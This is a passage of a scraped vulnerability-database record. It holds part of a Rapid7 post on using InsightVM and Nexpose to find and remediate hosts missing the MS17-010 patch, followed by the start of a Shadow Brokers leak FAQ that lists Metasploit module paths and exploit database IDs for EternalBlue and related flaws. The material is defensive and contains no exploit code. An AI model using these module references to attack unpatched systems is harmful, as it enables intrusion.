height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67244/Scantemplate-ms17-010.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p dir=\"ltr\" style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; 
font-family: Arial; color: #000000;\">This should return checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0143</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0144</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0145</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0146</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0147</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-external-small\" 
href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"padding-left: 30px;\">5. <span style=\"color: #000000; font-size: 11pt; font-family: Arial;\">Save the template and run a scan with it to identify every scanned asset that is still missing the MS17-010 patch. Only assets the scan engine can reach are reported, so make sure the scan scope covers all of the Windows systems you are responsible for.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dynamic Asset Group</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Now that you have scanned your assets, you may want to create a Dynamic Asset Group for reporting and tagging, which will update whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the </span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">InsightVM</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> console, just under the search button:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67245/Screen+Shot+2017-06-27+at+3.55.40+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.55.40 PM.png\" class=\"image-5 jive-image\" height=\"160\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67245/Screen+Shot+2017-06-27+at+3.55.40+PM.png\" style=\"width: auto; height: auto;\" width=\"620\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the six MS17-010 CVEs listed in step 4 above (CVE-2017-0143 through CVE-2017-0148), as shown below:</span></p><p><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a 
href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67246/Screen+Shot+2017-06-27+at+3.42.28+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.42.28 PM.png\" class=\"image-6 jive-image\" height=\"457\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67246/Screen+Shot+2017-06-27+at+3.42.28+PM.png\" style=\"width: 620px; height: 385px;\" width=\"736\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dashboard</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Rapid7 will add a pre-built dashboard for the Petya-like ransomworm, like we did with the recent WannaCry and Samba vulnerabilities.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Also, check out the new </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7908\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/06/13/live-threat-driven-prioritization\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">Threat Feed dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> which contains a view of your assets that are affected by actively targeted vulnerabilities including those leveraged by this ransomworm.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">If you want to build your own, </span><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">here&#8217;s </span><a class=\"jive-link-blog-small\" 
data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">how you can build a custom dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">, with examples taken from the Shadow Brokers leak.&#160; To find your exposure to MS17-010 vulnerabilities, you could use this Dashboard filter:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"background-color: #f6f6f6; color: #000000; font-family: 'courier new', courier; font-size: 12pt;\">asset.vulnerability.alternateIds &lt;=&gt; ( altId = \"MS17-010\" )<br/></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a SQL Query Export</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: </span><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning &amp; Reporting.</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Remediation Project</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">In InsightVM, you can also create a remediation project to track the progress of remediation. 
To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\"><a href=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\"><img class=\"jive-image\" height=\"144\" src=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in <span style=\"font-family: 'courier new', courier;\">vulnerability.alternateIds.altId CONTAINS \"MS17-010\"</span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\"><img class=\"jive-image\" height=\"248\" src=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability.</span></p><p style=\"min-height: 8pt; padding: 
0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7839\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/08/simple-remediation-collaboration\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">JIRA or ServiceNow</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, you can also configure the automatic ticketing integration between InsightVM and JIRA/ServiceNow to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for some of the vulnerabilities leveraged by this ransomworm. 
If you have any questions please don&#8217;t hesitate to let us know!</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on this ransomworm, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">please visit this page</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p></div><!-- [DocumentBodyEnd:880a7067-953c-4d86-bb9f-22e02d26586e] -->", "title": "Petya-like ransomworm: Leveraging InsightVM and Nexpose for visibility into MS17-010", "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "_object_type": "robots.models.rss.RssBulletin", "viewCount": 371, "enchantments": {"score": {"value": 7.7, "vector": "NONE", "modified": "2017-08-03T17:21:32", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", 
"1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": 
"mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2017-08-03T17:21:32", "rev": 2}}, "reporter": "Ken Mizota", "bulletinFamily": "blog", "objectVersion": "1.5", "type": "rapid7community", "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://community.rapid7.com/community/infosec/blog/2017/04/18/the-shadow-brokers-leaked-exploits-faq", "references": [], "enchantments_done": [], "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "id": "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "history": [], "modified": "2017-04-18T20:50:20", "lastseen": "2017-05-01T16:52:25", "published": "2017-04-18T20:50:20", "description": "<!-- 
[DocumentBodyStart:988188db-6fd0-45a3-a3c1-27dc87650c8c] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">The Rapid7 team has been busy evaluating the threats posed by <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Farstechnica.com%2Fsecurity%2F2017%2F04%2Fpurported-shadow-brokers-0days-were-in-fact-killed-by-mysterious-patch%2F\" rel=\"nofollow\" target=\"_blank\">last Friday&#8217;s Shadow Broker exploit and tool release</a> and answering questions from colleagues, customers, and family members about the release. We know that many people have questions about exactly what was released, the threat it poses, and how to respond, so we have decided to compile a list of frequently asked questions.</span></p><p><span style=\"font-size: 14pt;\"><br/><span style=\"font-family: Arial; color: #eb7a3d; font-weight: bold;\">What&#8217;s the story?</span></span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">On Friday, April 15, a hacking group known as the &ldquo;Shadow Brokers&#8221; released a trove of alleged NSA data, detailing exploits and vulnerabilities in a range of technologies. The data includes information on multiple Windows exploits, a framework called Fuzzbunch for loading the exploit binaries onto systems, and a variety of post-exploitation tools. </span></p><p><span style=\"font-size: 10pt;\"><br/><span style=\"font-family: Arial; color: #000000;\">This was understandably a cause for concern, but fortunately, none of the exploits were zero days. Many targeted older systems and the vulnerabilities they exploited were well-known, and four of the exploits targeted vulnerabilities that were patched last month. 
</span></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 14pt; font-family: Arial; color: #eb7a3d; font-weight: bold;\">Who are these shady characters?</span></p><p><span style=\"font-size: 10pt;\"><span style=\"font-family: Arial; color: #000000;\">The Shadow Brokers are a group that emerged in August of 2016, claiming to have information on tools used by a threat group known as <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fsecurelist.com%2Fblog%2Fresearch%2F68750%2Fequation-the-death-star-of-malware-galaxy%2F\" rel=\"nofollow\" target=\"_blank\">Equation Group</a></span><span style=\"font-family: Arial; color: #000000;\">. The initial information that was leaked by the Shadow Brokers involved firewall implants and exploitation scripts targeting vendors such as Cisco, Juniper, and Topsec, which were confirmed to be real and subsequently patched by the various vendors. Shadow Brokers also claimed to have access to a larger trove of information that they would sell for 1 million bitcoins, and later lowered the amount to 10,000 bitcoins, which could be crowdfunded so that the tools would be released to the public, rather than just to the highest bidder. The Shadow Brokers have popped up from time to time over the past 9 months leaking additional information, including IP addresses used by the Equation Group and additional tools. 
Last week, having failed to make their price, they released the password for the encrypted archive, and the security community went into a frenzy of salivation and speculation as it raced to unpack the secrets held in the vault.</span></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">The April 15th release seems to be the culmination of the Shadow Brokers&#8217; activity; however, it is possible that there is still additional information about the Equation Group that they have not yet released to the public.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 14pt; font-family: Arial; color: #eb7a3d; font-weight: bold;\">Should you be worried?</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt;\"><span style=\"font-family: Arial; color: #000000;\">A trove of nation state-level exploits being released for anyone to use is certainly not a good thing, particularly when they relate to the most widely-used software in the world, but the situation is not as dire as it originally seemed. There are patches available for all of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fblogs.technet.microsoft.com%2Fmsrc%2F2017%2F04%2F14%2Fprotecting-customers-and-evaluating-risk%2F\" rel=\"nofollow\" target=\"_blank\">vulnerabilities</a>, so a </span><span style=\"color: #000000; font-family: Arial; font-style: italic;\"><strong>very</strong></span><span style=\"font-family: Arial; color: #000000;\"> good starting point is to verify that your systems are up to date on patches. 
Home users and small network operators likely had the patches installed automatically in the last update, but it is always good to double-check.&#160; </span></span></p><p><br/><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">If you are unsure if you are up to date on these patches, we have checks for them all in <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fnexpose%2F\" target=\"_blank\">Rapid7 Nexpose</a> and <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">Rapid7 InsightVM</a>. <span style=\"font-family: Arial; color: #000000;\">These checks are all included in the </span><span style=\"font-family: Arial; color: #000000; font-style: italic;\">Microsoft hotfix</span><span style=\"font-family: Arial; color: #000000;\"> scan template.</span></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><div class=\"j-rte-table\"><table style=\"border: none;\"><tbody><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalBlue</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalSynergy</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalRomance</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalChampion</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS17-010</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: 
#000000;\">msft-cve-2017-0143</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0144</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0145</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0146</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0147</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0148</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EmeraldThread</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS10-061</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS10-061</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EskimoRoll</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS14-068</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS14-068</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EducatedScholar</span></p></td><td 
style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS09-050</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS09-050</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EclipsedWing</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS08-067</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS08-067</span></p></td></tr></tbody></table></div><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">If you want to ensure your patching efforts have been truly effective, or understand the impact of exploitation, you can test your exposure with several modules in <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fmetasploit%2F\" target=\"_blank\">Rapid7 Metasploit</a>:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><div class=\"j-rte-table\"><table style=\"border: none;\"><tbody><tr><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalBlue</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: 
#000000;\">MS17-010</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">auxiliary/scanner/smb/smb_ms17_010</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EmeraldThread</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS10-061</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">exploit/windows/smb/psexec</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalChampion</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS17-010</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;background-color: 